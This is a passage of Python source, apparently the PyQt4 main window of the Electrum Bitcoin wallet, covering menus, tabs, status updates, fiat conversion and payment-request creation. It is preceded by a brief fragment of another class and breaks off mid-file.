self.session = session
self.API = API
class SimulationVar(object):
def __init__(self, session, API):
self.session = session
self.API = API
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
from electrum.util import bh2u, bfh
from . import icons_rc
from electrum import keystore
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled)
from electrum import Transaction, mnemonic
from electrum import util, bitcoin, commands, coinchooser
from electrum import SimpleConfig, paymentrequest
from electrum.wallet import Wallet, Multisig_Wallet
try:
from electrum.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from electrum import ELECTRUM_VERSION
import re
from .util import *
class StatusBarButton(QPushButton):
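# A flat 25x25 icon button used in the status bar; triggers func on click
# or when Return is pressed.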
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.connect(self, SIGNAL('new_fx_quotes'), self.on_fx_quotes)
self.connect(self, SIGNAL('new_fx_history'), self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.emit(SIGNAL('new_fx_history'))
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.emit(SIGNAL('new_fx_quotes'))
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.emit(QtCore.SIGNAL('updated'), event, *args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
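# Resolve the configured OpenAlias on a background daemon thread and emit
# 'alias_received' when the lookup completes.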
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Now that the GUI is initialized, check whether any transactions need announcing; the callback may have fired before the GUI existed
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = 'Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mBTC'
if self.decimal_point == 8:
return 'BTC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
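        # Two-way binding between a BTC amount edit and its fiat counterpart:
        # editing either field recomputes the other from the current exchange rate,
        # and the 'follows' flags keep the textChanged handlers from recursing.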
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(BLACK_FG)
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(BLUE_FG)
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(BLUE_FG)
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
            _('The Bitcoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
                f.write(pr)  # pr is the serialized bytes returned by SerializeToString()
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
from electrum.wallet import Imported_Wallet
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address()
if addr:
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
